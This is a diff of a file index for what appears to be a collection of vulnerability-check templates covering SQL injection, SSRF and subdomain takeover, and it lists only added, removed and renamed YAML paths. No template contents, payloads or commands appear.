+91589,13 @@ ./poc/sql/wordpress-database-reset-bb118af862f0dedbb8fbcebd4f28d2c3.yaml ./poc/sql/wordpress-database-reset.yaml ./poc/sql/wordpress-db-backup-11251.yaml +./poc/sql/wordpress-db-backup-listing-11248.yaml ./poc/sql/wordpress-db-backup-listing-11249.yaml -./poc/sql/wordpress-db-backup-listing-11250.yaml ./poc/sql/wordpress-db-backup-listing.yaml ./poc/sql/wordpress-db-backup.yaml -./poc/sql/wordpress-db-repair-11252.yaml ./poc/sql/wordpress-db-repair-11253.yaml ./poc/sql/wordpress-db-repair-11254.yaml +./poc/sql/wordpress-db-repair-11255.yaml ./poc/sql/wordpress-db-repair.yaml ./poc/sql/wordpress-db3daefc79ef0c3afc5d2a722651f6df.yaml ./poc/sql/wordpress-e2566e3cb656dbaa90bc1ac1fbedb4e7.yaml @@ -92081,6 +92084,7 @@ ./poc/sql/wuzhicms-sqli-11657.yaml ./poc/sql/wuzhicms-sqli-11658.yaml ./poc/sql/wuzhicms-sqli-11659.yaml +./poc/sql/wuzhicms-sqli.yaml ./poc/sql/wuzhicms-v410-sqli.yaml ./poc/sql/wuzhicms-v410-sqli.yml ./poc/sql/wysija-newsletters-cf1805e5f67acdb9fd1eace8a56b6c8a.yaml @@ -92093,7 +92097,6 @@ ./poc/sql/xdcms-sqli-11665.yaml ./poc/sql/xdcms-sqli-11666.yaml ./poc/sql/xdcms-sqli-11667.yaml -./poc/sql/xdcms-sqli.yaml ./poc/sql/xhanch-my-twitter-13afd7959bdba431246ec18eac06eb55.yaml ./poc/sql/xo-event-calendar-4141db509b6d506a88a5f846b22304e8.yaml ./poc/sql/xray-clandbeta.yaml @@ -92129,7 +92132,6 @@ ./poc/sql/yongyou-ICurrtype-sqli.yaml ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/sql/yongyou-jdbcRead.yaml -./poc/sql/yongyou-jdbcread.yaml ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml ./poc/sql/yongyou-u8-oa-sqli-11746.yaml @@ -92155,6 +92157,7 @@ ./poc/sql/yonyou-nc-workflowImageServlet-sqli.yaml ./poc/sql/yonyou-u8-cloud-ExportUfoFormatAction-sqli.yaml ./poc/sql/yonyou-u8-oa-sqli-11748.yaml +./poc/sql/yonyou-u8-oa-sqli.yaml ./poc/sql/yonyou-u8-registerservlet-sqli.yaml ./poc/sql/yonyouFE-SQLI-file_publish_open.yaml ./poc/sql/yonyouFE-sqli-assetsTestList.yaml @@ -92180,7 +92183,6 @@ ./poc/sql/zcms-v3-sqli-11773.yaml ./poc/sql/zcms-v3-sqli-11774.yaml ./poc/sql/zcms-v3-sqli-11775.yaml -./poc/sql/zcms-v3-sqli.yaml ./poc/sql/zcms-v3-sqli.yml ./poc/sql/zedity-c7045c7b1b37741c1ecddb1c916e5d0d.yaml ./poc/sql/zelist-directory-cdb095d442838a408738c8c91f13a60a.yaml @@ -92211,7 +92213,6 @@ ./poc/sql_injection/74cms-show-sqli.yaml ./poc/sql_injection/74cms-sqli-1.yaml ./poc/sql_injection/74cms-sqli-1.yml -./poc/sql_injection/74cms-sqli-10.yaml ./poc/sql_injection/74cms-sqli-2.yaml ./poc/sql_injection/74cms-sqli-2.yml ./poc/sql_injection/74cms-sqli-8.yaml @@ -92468,7 +92469,8 @@ ./poc/sql_injection/btoptionscom-newspack-sqli.yaml ./poc/sql_injection/chamilo-lms-sqli-1.yaml ./poc/sql_injection/chamilo-lms-sqli-2.yaml -./poc/sql_injection/chamilo-lms-sqli-892.yaml +./poc/sql_injection/chamilo-lms-sqli-891.yaml +./poc/sql_injection/chamilo-lms-sqli.yaml ./poc/sql_injection/changjet-tplus-keyinfolist-sqli.yaml ./poc/sql_injection/chanjet-CRM-sqli.yaml ./poc/sql_injection/chanjetcrm-sqli.yaml @@ -92491,7 +92493,6 @@ ./poc/sql_injection/discuz-v72-sqli.yaml ./poc/sql_injection/discuz-v72-sqli.yml ./poc/sql_injection/dotnetcms-sqli-7089.yaml -./poc/sql_injection/dotnetcms-sqli.yaml ./poc/sql_injection/dotnetcms-sqli.yml ./poc/sql_injection/drupal-cve-2014-3704-sqli.yml ./poc/sql_injection/duomicms-sqli.yaml @@ -92507,9 +92508,8 @@ ./poc/sql_injection/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql_injection/ecology-sqli2.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml -./poc/sql_injection/ecology-syncuserinfo-sqli.yaml ./poc/sql_injection/ecology-syncuserinfo-sqli.yml -./poc/sql_injection/ecology-v8-sqli.yaml +./poc/sql_injection/ecology-v8-sqli-7179.yaml ./poc/sql_injection/ecology-v8-sqli.yml ./poc/sql_injection/ecology-v9-sqli.yaml ./poc/sql_injection/ecology-validate-sqli.yml @@ -92525,12 +92525,10 @@ ./poc/sql_injection/etouch-v2-sqli-7266.yaml ./poc/sql_injection/etouch-v2-sqli-7267.yaml ./poc/sql_injection/etouch-v2-sqli-7268.yaml -./poc/sql_injection/etouch-v2-sqli-7269.yaml ./poc/sql_injection/etouch-v2-sqli.yml ./poc/sql_injection/exposed-sqlite-manager-1.yaml ./poc/sql_injection/exposed-sqlite-manager-2.yaml ./poc/sql_injection/exposed-sqlite-manager-7349.yaml -./poc/sql_injection/exposed-sqlite-manager-7350.yaml ./poc/sql_injection/exposed-sqlite-manager.yaml ./poc/sql_injection/ezeip-sqli.yaml ./poc/sql_injection/fangweicms-sqli.yaml @@ -92541,7 +92539,6 @@ ./poc/sql_injection/fanwei_eoffice_init_sqli.yaml ./poc/sql_injection/fanwei_eoffice_json_common_sqli.yaml ./poc/sql_injection/finecms-sqli-7475.yaml -./poc/sql_injection/finecms-sqli.yaml ./poc/sql_injection/finecms-sqli.yml ./poc/sql_injection/glodon-linkworks-GetIMDictionary-sqli.yaml ./poc/sql_injection/glodon-linkworks-getimdictionary-sqli.yaml @@ -92573,9 +92570,10 @@ ./poc/sql_injection/joomla-sqli-hdwplayer.yaml ./poc/sql_injection/joomla-sqli-vnmshop.yaml ./poc/sql_injection/joomla-sqli-weblinks_categories.yaml -./poc/sql_injection/kevinlab-bems-sqli-8457.yaml ./poc/sql_injection/kevinlab-bems-sqli-8458.yaml ./poc/sql_injection/kevinlab-bems-sqli-8459.yaml +./poc/sql_injection/kevinlab-bems-sqli-8460.yaml +./poc/sql_injection/kevinlab-bems-sqli.yaml ./poc/sql_injection/landray-eis-rpt-listreport-definefield-sqli.yaml ./poc/sql_injection/leaguemanager-sqli.yaml ./poc/sql_injection/mcms-list-do-sqli.yaml @@ -92608,6 +92606,8 @@ ./poc/sql_injection/realor_tianyi_avs_demo_sql_injection.yaml ./poc/sql_injection/seaCMS-sqli.yaml ./poc/sql_injection/seacms-sqli(1).yaml +./poc/sql_injection/seacms-sqli-10103.yaml +./poc/sql_injection/seacms-sqli.yaml ./poc/sql_injection/seacms-sqli.yml ./poc/sql_injection/seacms-v101v11-comment-api-sqli.yaml ./poc/sql_injection/seeyon-wooyun-2015-0108235-sqli.yaml @@ -92695,13 +92695,13 @@ ./poc/sql_injection/wuzhicms-sqli-11657.yaml ./poc/sql_injection/wuzhicms-sqli-11658.yaml ./poc/sql_injection/wuzhicms-sqli-11659.yaml +./poc/sql_injection/wuzhicms-sqli.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yaml ./poc/sql_injection/wuzhicms-v410-sqli.yml ./poc/sql_injection/xdcms-sqli-11664.yaml ./poc/sql_injection/xdcms-sqli-11665.yaml ./poc/sql_injection/xdcms-sqli-11666.yaml ./poc/sql_injection/xdcms-sqli-11667.yaml -./poc/sql_injection/xdcms-sqli.yaml ./poc/sql_injection/yongyou-ICurrtype-sqli.yaml ./poc/sql_injection/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/sql_injection/yongyou-u8-oa-sqli-11746.yaml @@ -92723,6 +92723,7 @@ ./poc/sql_injection/yonyou-nc-workflowImageServlet-sqli.yaml ./poc/sql_injection/yonyou-u8-cloud-ExportUfoFormatAction-sqli.yaml ./poc/sql_injection/yonyou-u8-oa-sqli-11748.yaml +./poc/sql_injection/yonyou-u8-oa-sqli.yaml ./poc/sql_injection/yonyou-u8-registerservlet-sqli.yaml ./poc/sql_injection/yonyouFE-SQLI-file_publish_open.yaml ./poc/sql_injection/yonyouFE-sqli-assetsTestList.yaml @@ -92737,7 +92738,6 @@ ./poc/sql_injection/zcms-v3-sqli-11773.yaml ./poc/sql_injection/zcms-v3-sqli-11774.yaml ./poc/sql_injection/zcms-v3-sqli-11775.yaml -./poc/sql_injection/zcms-v3-sqli.yaml ./poc/sql_injection/zcms-v3-sqli.yml ./poc/sql_injection/zero-spam-sqli.yaml ./poc/sql_injection/zerof-web-server-handleevent-sqli.yaml @@ -92947,8 +92947,8 @@ ./poc/ssrf/cloudflare-image-ssrf-1021.yaml ./poc/ssrf/cloudflare-image-ssrf-1022.yaml ./poc/ssrf/cloudflare-image-ssrf-1023.yaml +./poc/ssrf/confluence-ssrf-sharelinks-1190.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1191.yaml -./poc/ssrf/confluence-ssrf-sharelinks-1192.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1193.yaml ./poc/ssrf/confluence-ssrf-sharelinks-1194.yaml ./poc/ssrf/custom-microsoft-ssrf-detect.yaml @@ -92962,11 +92962,11 @@ ./poc/ssrf/gitlab-ssrf-cve-2021-22214.yml ./poc/ssrf/hasura-graphql-ssrf-7903.yaml ./poc/ssrf/hasura-graphql-ssrf-7904.yaml -./poc/ssrf/hasura-graphql-ssrf-7905.yaml ./poc/ssrf/hasura-graphql-ssrf-7906.yaml ./poc/ssrf/hasura-graphql-ssrf.yaml ./poc/ssrf/header-blind-ssrf.yaml ./poc/ssrf/hidden-ssrf.yaml +./poc/ssrf/ibm-websphere-ssrf-8126.yaml ./poc/ssrf/ibm-websphere-ssrf.yaml ./poc/ssrf/images_proxy_ssrf.yaml ./poc/ssrf/jboss-ssrf.yaml @@ -92982,10 +92982,12 @@ ./poc/ssrf/linkerd-ssrf-detect.yaml ./poc/ssrf/microstrategy-ssrf-1.yaml ./poc/ssrf/microstrategy-ssrf-2.yaml +./poc/ssrf/microstrategy-ssrf-8859.yaml ./poc/ssrf/microstrategy-ssrf-8860.yaml +./poc/ssrf/microstrategy-ssrf-8861.yaml ./poc/ssrf/microstrategy-ssrf.yaml ./poc/ssrf/office-webapps-ssrf.yaml -./poc/ssrf/openbmcs-ssrf-9261.yaml +./poc/ssrf/openbmcs-ssrf.yaml ./poc/ssrf/openfire-cve-2019-18394-ssrf.yml ./poc/ssrf/poc-yaml-vmware-vcenter-ssrf.yaml ./poc/ssrf/request-backets-ssrf.yaml @@ -92999,7 +93001,6 @@ ./poc/ssrf/ssrf-fuzz.yaml ./poc/ssrf/ssrf-injection.yaml ./poc/ssrf/ssrf-via-oauth-misconfig-10525.yaml -./poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml ./poc/ssrf/ssrf-via-oauth-misconfig-10527.yaml ./poc/ssrf/ssrf-via-proxy.yaml ./poc/ssrf/ssrf-vuln-params.yaml @@ -93012,7 +93013,6 @@ ./poc/ssrf/ssrf_nagli.yaml ./poc/ssrf/targa-camera-ssrf-10656.yaml ./poc/ssrf/targa-camera-ssrf-10657.yaml -./poc/ssrf/targa-camera-ssrf.yaml ./poc/ssrf/titannit-web-ssrf.yaml ./poc/ssrf/umbraco-base-ssrf-1.yaml ./poc/ssrf/umbraco-base-ssrf-10880.yaml @@ -93022,12 +93022,12 @@ ./poc/ssrf/umbraco-base-ssrf-3.yaml ./poc/ssrf/vmware-vcenter-ssrf-11051.yaml ./poc/ssrf/vmware-vcenter-ssrf-11052.yaml -./poc/ssrf/vmware-vcenter-ssrf-11053.yaml ./poc/ssrf/vmware-vrealize-cve-2021-21975-ssrf.yml ./poc/ssrf/w3c-total-cache-ssrf-11077.yaml ./poc/ssrf/w3c-total-cache-ssrf-11078.yaml ./poc/ssrf/w3c-total-cache-ssrf-11079.yaml -./poc/ssrf/w3c-total-cache-ssrf-11081.yaml +./poc/ssrf/w3c-total-cache-ssrf-11080.yaml +./poc/ssrf/w3c-total-cache-ssrf.yaml ./poc/ssrf/weblogic-ssrf.yaml ./poc/ssrf/weblogic-ssrf.yml ./poc/ssrf/webpagetest-ssrf.yaml @@ -93039,13 +93039,12 @@ ./poc/ssrf/wp-multiple-theme-ssrf-11510.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11511.yaml ./poc/ssrf/wp-multiple-theme-ssrf-11512.yaml -./poc/ssrf/wp-multiple-theme-ssrf-11513.yaml ./poc/ssrf/wp-plugin-canto-ssrf.yaml ./poc/ssrf/wp-under-construction-ssrf.yaml ./poc/ssrf/wso2-ssrf.yaml ./poc/ssrf/xfh-ssrf.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11686.yaml -./poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml +./poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11690.yaml ./poc/ssrf/xmlrpc-pingback-ssrf.yaml @@ -93057,79 +93056,82 @@ ./poc/subdomain_takeover/account-takeover-via-registration.yaml ./poc/subdomain_takeover/acquia-takeover-34.yaml ./poc/subdomain_takeover/acquia-takeover.yaml -./poc/subdomain_takeover/aftership-takeover-202.yaml ./poc/subdomain_takeover/aftership-takeover-203.yaml +./poc/subdomain_takeover/aftership-takeover-204.yaml ./poc/subdomain_takeover/aftership-takeover-205.yaml ./poc/subdomain_takeover/aftership-takeover-206.yaml ./poc/subdomain_takeover/agilecrm-takeover-208.yaml ./poc/subdomain_takeover/agilecrm-takeover-209.yaml +./poc/subdomain_takeover/agilecrm-takeover-210.yaml ./poc/subdomain_takeover/agilecrm-takeover-211.yaml ./poc/subdomain_takeover/aha-takeover-213.yaml ./poc/subdomain_takeover/aha-takeover-214.yaml ./poc/subdomain_takeover/aha-takeover-216.yaml ./poc/subdomain_takeover/aha-takeover-217.yaml ./poc/subdomain_takeover/airee-takeover-226.yaml -./poc/subdomain_takeover/airee-takeover-227.yaml +./poc/subdomain_takeover/airee-takeover-228.yaml ./poc/subdomain_takeover/airee-takeover.yaml ./poc/subdomain_takeover/anima-takeover-317.yaml ./poc/subdomain_takeover/anima-takeover-318.yaml -./poc/subdomain_takeover/anima-takeover-319.yaml +./poc/subdomain_takeover/anima-takeover-320.yaml ./poc/subdomain_takeover/anima-takeover.yaml -./poc/subdomain_takeover/announcekit-takeover-322.yaml +./poc/subdomain_takeover/announcekit-takeover-321.yaml ./poc/subdomain_takeover/announcekit-takeover-323.yaml +./poc/subdomain_takeover/announcekit-takeover-324.yaml ./poc/subdomain_takeover/announcekit-takeover.yaml ./poc/subdomain_takeover/aws-bucket-takeover-630.yaml ./poc/subdomain_takeover/aws-bucket-takeover-631.yaml ./poc/subdomain_takeover/aws-bucket-takeover.yaml ./poc/subdomain_takeover/azure-takeover-detection-681.yaml ./poc/subdomain_takeover/azure-takeover-detection-682.yaml +./poc/subdomain_takeover/azure-takeover-detection-683.yaml ./poc/subdomain_takeover/azure-takeover-detection.yaml -./poc/subdomain_takeover/bigcartel-takeover-727.yaml +./poc/subdomain_takeover/bigcartel-takeover-728.yaml ./poc/subdomain_takeover/bigcartel-takeover-729.yaml ./poc/subdomain_takeover/bigcartel-takeover.yaml ./poc/subdomain_takeover/bitbucket-takeover-738.yaml -./poc/subdomain_takeover/bitbucket-takeover-740.yaml +./poc/subdomain_takeover/bitbucket-takeover-739.yaml ./poc/subdomain_takeover/bitbucket-takeover-741.yaml ./poc/subdomain_takeover/bitbucket-takeover.yaml -./poc/subdomain_takeover/brightcove-takeover-785.yaml +./poc/subdomain_takeover/brightcove-takeover-784.yaml ./poc/subdomain_takeover/brightcove-takeover.yaml ./poc/subdomain_takeover/campaignmonitor-takeover.yaml ./poc/subdomain_takeover/canny-takeover-854.yaml ./poc/subdomain_takeover/canny-takeover-856.yaml ./poc/subdomain_takeover/canny-takeover-857.yaml ./poc/subdomain_takeover/canny-takeover.yaml +./poc/subdomain_takeover/cargo-takeover-866.yaml ./poc/subdomain_takeover/cargo-takeover-867.yaml ./poc/subdomain_takeover/cargo-takeover-868.yaml -./poc/subdomain_takeover/cargo-takeover-869.yaml ./poc/subdomain_takeover/cargo-takeover.yaml ./poc/subdomain_takeover/cargocollective-takeover-862.yaml -./poc/subdomain_takeover/cargocollective-takeover-863.yaml ./poc/subdomain_takeover/cargocollective-takeover-864.yaml +./poc/subdomain_takeover/cargocollective-takeover-865.yaml ./poc/subdomain_takeover/cargocollective-takeover.yaml ./poc/subdomain_takeover/ceros-takeover.yaml ./poc/subdomain_takeover/detect-all-takeover.yaml ./poc/subdomain_takeover/detect-all-takeovers.yaml ./poc/subdomain_takeover/elasticbeanstalk-takeover.yaml +./poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml ./poc/subdomain_takeover/elasticbeantalk-takeover.yaml ./poc/subdomain_takeover/fastly-takeover-7430.yaml ./poc/subdomain_takeover/fastly-takeover.yaml ./poc/subdomain_takeover/feedpress-takeover-7455.yaml ./poc/subdomain_takeover/feedpress-takeover-7456.yaml -./poc/subdomain_takeover/feedpress-takeover-7457.yaml ./poc/subdomain_takeover/feedpress-takeover.yaml ./poc/subdomain_takeover/flexbe-takeover-7504.yaml -./poc/subdomain_takeover/flexbe-takeover-7506.yaml +./poc/subdomain_takeover/flexbe-takeover-7505.yaml ./poc/subdomain_takeover/flexbe-takeover.yaml ./poc/subdomain_takeover/flywheel-takeover-7525.yaml -./poc/subdomain_takeover/flywheel-takeover-7526.yaml ./poc/subdomain_takeover/flywheel-takeover.yaml -./poc/subdomain_takeover/freshdesk-takeover-7541.yaml +./poc/subdomain_takeover/flywheel_takeover.yaml +./poc/subdomain_takeover/freshdesk-takeover-7540.yaml ./poc/subdomain_takeover/freshdesk-takeover.yaml ./poc/subdomain_takeover/freshservice-takeover.yaml -./poc/subdomain_takeover/frontify-takeover-7542.yaml ./poc/subdomain_takeover/frontify-takeover-7543.yaml +./poc/subdomain_takeover/frontify-takeover-7544.yaml ./poc/subdomain_takeover/frontify-takeover.yaml -./poc/subdomain_takeover/gemfury-takeover-7576.yaml +./poc/subdomain_takeover/gemfury-takeover-7577.yaml ./poc/subdomain_takeover/gemfury-takeover-7578.yaml ./poc/subdomain_takeover/gemfury-takeover-7579.yaml ./poc/subdomain_takeover/gemfury-takeover.yaml @@ -93140,22 +93142,26 @@ ./poc/subdomain_takeover/getresponse-takeover.yaml ./poc/subdomain_takeover/ghost-takeover-7619.yaml ./poc/subdomain_takeover/ghost-takeover-7620.yaml -./poc/subdomain_takeover/ghost-takeover-7622.yaml +./poc/subdomain_takeover/ghost-takeover-7621.yaml ./poc/subdomain_takeover/ghost-takeover.yaml +./poc/subdomain_takeover/gitbook-takeover-7626.yaml ./poc/subdomain_takeover/gitbook-takeover-7627.yaml ./poc/subdomain_takeover/gitbook-takeover.yaml ./poc/subdomain_takeover/github-takeover-7658.yaml ./poc/subdomain_takeover/github-takeover-7659.yaml +./poc/subdomain_takeover/github-takeover-7660.yaml ./poc/subdomain_takeover/github-takeover-7661.yaml ./poc/subdomain_takeover/github-takeover-7662.yaml ./poc/subdomain_takeover/github-takeover-7663.yaml ./poc/subdomain_takeover/github-takeover.yaml ./poc/subdomain_takeover/hatenablog-takeover-7907.yaml ./poc/subdomain_takeover/hatenablog-takeover-7908.yaml +./poc/subdomain_takeover/hatenablog-takeover-7909.yaml ./poc/subdomain_takeover/hatenablog-takeover-7910.yaml ./poc/subdomain_takeover/hatenablog-takeover.yaml ./poc/subdomain_takeover/helpjuice-takeover-7925.yaml ./poc/subdomain_takeover/helpjuice-takeover-7926.yaml +./poc/subdomain_takeover/helpjuice-takeover-7927.yaml ./poc/subdomain_takeover/helpjuice-takeover-7928.yaml ./poc/subdomain_takeover/helpjuice-takeover.yaml ./poc/subdomain_takeover/helprace-takeover-7929.yaml @@ -93164,7 +93170,6 @@ ./poc/subdomain_takeover/helprace-takeover.yaml ./poc/subdomain_takeover/helpscout-takeover-7933.yaml ./poc/subdomain_takeover/helpscout-takeover-7934.yaml -./poc/subdomain_takeover/helpscout-takeover-7935.yaml ./poc/subdomain_takeover/helpscout-takeover-7936.yaml ./poc/subdomain_takeover/helpscout-takeover.yaml ./poc/subdomain_takeover/heroku-takeover-7941.yaml @@ -93175,39 +93180,39 @@ ./poc/subdomain_takeover/hubspot-takeover-8078.yaml ./poc/subdomain_takeover/hubspot-takeover-8079.yaml ./poc/subdomain_takeover/hubspot-takeover.yaml +./poc/subdomain_takeover/intercom-takeover-8166.yaml ./poc/subdomain_takeover/intercom-takeover-8167.yaml -./poc/subdomain_takeover/intercom-takeover-8168.yaml ./poc/subdomain_takeover/intercom-takeover-8169.yaml ./poc/subdomain_takeover/intercom-takeover.yaml ./poc/subdomain_takeover/jazzhr-takeover-8233.yaml ./poc/subdomain_takeover/jazzhr-takeover-8234.yaml -./poc/subdomain_takeover/jazzhr-takeover-8235.yaml -./poc/subdomain_takeover/jazzhr-takeover-8236.yaml ./poc/subdomain_takeover/jazzhr-takeover.yaml ./poc/subdomain_takeover/jetbrains-takeover-8292.yaml -./poc/subdomain_takeover/jetbrains-takeover-8293.yaml ./poc/subdomain_takeover/jetbrains-takeover-8294.yaml ./poc/subdomain_takeover/jetbrains-takeover.yaml ./poc/subdomain_takeover/kinsta-takeover-8492.yaml +./poc/subdomain_takeover/kinsta-takeover-8493.yaml ./poc/subdomain_takeover/kinsta-takeover-8494.yaml +./poc/subdomain_takeover/kinsta-takeover-8495.yaml ./poc/subdomain_takeover/kinsta-takeover.yaml ./poc/subdomain_takeover/landingi-takeover-8567.yaml ./poc/subdomain_takeover/landingi-takeover.yaml +./poc/subdomain_takeover/launchrock-takeover-8602.yaml ./poc/subdomain_takeover/launchrock-takeover-8603.yaml ./poc/subdomain_takeover/launchrock-takeover-8604.yaml -./poc/subdomain_takeover/launchrock-takeover-8605.yaml ./poc/subdomain_takeover/launchrock-takeover.yaml ./poc/subdomain_takeover/leadpages-takeover.yaml ./poc/subdomain_takeover/locomotivetakeover.yaml ./poc/subdomain_takeover/mashery-takeover-8783.yaml ./poc/subdomain_takeover/mashery-takeover-8784.yaml ./poc/subdomain_takeover/mashery-takeover-8785.yaml +./poc/subdomain_takeover/mashery-takeover-8786.yaml ./poc/subdomain_takeover/mashery-takeover.yaml ./poc/subdomain_takeover/medium-takeover-8797.yaml ./poc/subdomain_takeover/medium-takeover.yaml ./poc/subdomain_takeover/meteor-takeover.yaml ./poc/subdomain_takeover/netlify-takeover-9042.yaml -./poc/subdomain_takeover/netlify-takeover-9044.yaml +./poc/subdomain_takeover/netlify-takeover-9043.yaml ./poc/subdomain_takeover/netlify-takeover.yaml ./poc/subdomain_takeover/ngrok-takeover-9126.yaml ./poc/subdomain_takeover/ngrok-takeover-9127.yaml @@ -93215,51 +93220,52 @@ ./poc/subdomain_takeover/ngrok-takeover.yaml ./poc/subdomain_takeover/pagewiz-takeover.yaml ./poc/subdomain_takeover/pantheon-takeover-9458.yaml -./poc/subdomain_takeover/pantheon-takeover-9459.yaml ./poc/subdomain_takeover/pantheon-takeover-9460.yaml ./poc/subdomain_takeover/pantheon-takeover-9461.yaml ./poc/subdomain_takeover/pantheon-takeover.yaml -./poc/subdomain_takeover/pingdom-takeover-9584.yaml ./poc/subdomain_takeover/pingdom-takeover-9585.yaml +./poc/subdomain_takeover/pingdom-takeover-9586.yaml ./poc/subdomain_takeover/pingdom-takeover-9587.yaml ./poc/subdomain_takeover/pingdom-takeover.yaml +./poc/subdomain_takeover/proposify-takeover-9693.yaml ./poc/subdomain_takeover/proposify-takeover-9694.yaml -./poc/subdomain_takeover/proposify-takeover-9695.yaml ./poc/subdomain_takeover/proposify-takeover-9696.yaml ./poc/subdomain_takeover/proposify-takeover.yaml ./poc/subdomain_takeover/readme-takeover-9841.yaml ./poc/subdomain_takeover/readme-takeover-9842.yaml +./poc/subdomain_takeover/readme-takeover-9843.yaml ./poc/subdomain_takeover/readme-takeover.yaml +./poc/subdomain_takeover/readthedocs-takeover-9844.yaml ./poc/subdomain_takeover/readthedocs-takeover-9845.yaml ./poc/subdomain_takeover/readthedocs-takeover-9846.yaml -./poc/subdomain_takeover/readthedocs-takeover-9847.yaml ./poc/subdomain_takeover/readthedocs-takeover.yaml ./poc/subdomain_takeover/s3-subtakeover-9967.yaml ./poc/subdomain_takeover/s3-subtakeover-9968.yaml ./poc/subdomain_takeover/s3-subtakeover-9969.yaml ./poc/subdomain_takeover/s3-subtakeover.yaml ./poc/subdomain_takeover/shopify-takeover-10201.yaml -./poc/subdomain_takeover/shopify-takeover-10203.yaml +./poc/subdomain_takeover/shopify-takeover-10202.yaml ./poc/subdomain_takeover/shopify-takeover-10204.yaml ./poc/subdomain_takeover/shopify-takeover.yaml ./poc/subdomain_takeover/short-io-takeover.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10271.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10272.yaml -./poc/subdomain_takeover/simplebooklet-takeover-10273.yaml +./poc/subdomain_takeover/simplebooklet-takeover-10274.yaml ./poc/subdomain_takeover/simplebooklet-takeover.yaml ./poc/subdomain_takeover/smartjob-takeover-10322.yaml -./poc/subdomain_takeover/smartjob-takeover-10324.yaml +./poc/subdomain_takeover/smartjob-takeover-10323.yaml ./poc/subdomain_takeover/smartjob-takeover-10325.yaml ./poc/subdomain_takeover/smartjob-takeover.yaml ./poc/subdomain_takeover/smartling-takeover-10326.yaml ./poc/subdomain_takeover/smartling-takeover.yaml -./poc/subdomain_takeover/smugmug-takeover-10337.yaml ./poc/subdomain_takeover/smugmug-takeover-10338.yaml ./poc/subdomain_takeover/smugmug-takeover-10339.yaml +./poc/subdomain_takeover/smugmug-takeover-10340.yaml ./poc/subdomain_takeover/smugmug-takeover.yaml ./poc/subdomain_takeover/sprintful-takeover-10495.yaml ./poc/subdomain_takeover/sprintful-takeover.yaml ./poc/subdomain_takeover/strikingly-takeover-10549.yaml +./poc/subdomain_takeover/strikingly-takeover-10550.yaml ./poc/subdomain_takeover/strikingly-takeover-10551.yaml ./poc/subdomain_takeover/strikingly-takeover.yaml ./poc/subdomain_takeover/subdomain-takeOver.yaml @@ -93268,7 +93274,7 @@ ./poc/subdomain_takeover/subdomain-takeover.yaml ./poc/subdomain_takeover/surge-takeover-10579.yaml ./poc/subdomain_takeover/surge-takeover.yaml -./poc/subdomain_takeover/surveygizmo-takeover-10581.yaml +./poc/subdomain_takeover/surveygizmo-takeover-10582.yaml ./poc/subdomain_takeover/surveygizmo-takeover-10583.yaml ./poc/subdomain_takeover/surveygizmo-takeover-10584.yaml ./poc/subdomain_takeover/surveygizmo-takeover.yaml @@ -93276,14 +93282,15 @@ ./poc/subdomain_takeover/takeover-checker.yaml ./poc/subdomain_takeover/tave-takeover-10659.yaml ./poc/subdomain_takeover/tave-takeover-10660.yaml -./poc/subdomain_takeover/tave-takeover-10662.yaml +./poc/subdomain_takeover/tave-takeover-10661.yaml ./poc/subdomain_takeover/tave-takeover.yaml ./poc/subdomain_takeover/teamwork-takeover-10669.yaml ./poc/subdomain_takeover/teamwork-takeover-10670.yaml ./poc/subdomain_takeover/teamwork-takeover-10671.yaml ./poc/subdomain_takeover/teamwork-takeover.yaml ./poc/subdomain_takeover/tictail-takeover-10766.yaml -./poc/subdomain_takeover/tictail-takeover-10767.yaml +./poc/subdomain_takeover/tictail-takeover-10768.yaml +./poc/subdomain_takeover/tictail-takeover-10769.yaml ./poc/subdomain_takeover/tictail-takeover.yaml ./poc/subdomain_takeover/tilda-takeover-10781.yaml ./poc/subdomain_takeover/tilda-takeover-10782.yaml @@ -93293,37 +93300,37 @@ ./poc/subdomain_takeover/tumblr-takeover-10846.yaml ./poc/subdomain_takeover/tumblr-takeover.yaml ./poc/subdomain_takeover/uberflip-takeover-10864.yaml +./poc/subdomain_takeover/uberflip-takeover-10865.yaml ./poc/subdomain_takeover/uberflip-takeover-10866.yaml -./poc/subdomain_takeover/uberflip-takeover-10867.yaml ./poc/subdomain_takeover/uberflip-takeover.yaml -./poc/subdomain_takeover/unbounce-takeover-10970.yaml +./poc/subdomain_takeover/unbounce-takeover-10971.yaml ./poc/subdomain_takeover/unbounce-takeover.yaml -./poc/subdomain_takeover/uptimerobot-takeover-10987.yaml +./poc/subdomain_takeover/uptimerobot-takeover-10986.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10988.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10989.yaml ./poc/subdomain_takeover/uptimerobot-takeover.yaml +./poc/subdomain_takeover/urge-takeover-10991.yaml ./poc/subdomain_takeover/urge-takeover.yaml ./poc/subdomain_takeover/uservoice-takeover.yaml -./poc/subdomain_takeover/vend-takeover-10996.yaml ./poc/subdomain_takeover/vend-takeover-10997.yaml ./poc/subdomain_takeover/vend-takeover-10998.yaml +./poc/subdomain_takeover/vend-takeover-10999.yaml ./poc/subdomain_takeover/vend-takeover.yaml -./poc/subdomain_takeover/vercel-takeover-11001.yaml +./poc/subdomain_takeover/vercel-takeover-11000.yaml ./poc/subdomain_takeover/vercel-takeover.yaml ./poc/subdomain_takeover/webflow-takeover-11131.yaml -./poc/subdomain_takeover/webflow-takeover-11132.yaml +./poc/subdomain_takeover/webflow-takeover-11133.yaml ./poc/subdomain_takeover/webflow-takeover-11134.yaml ./poc/subdomain_takeover/webflow-takeover.yaml 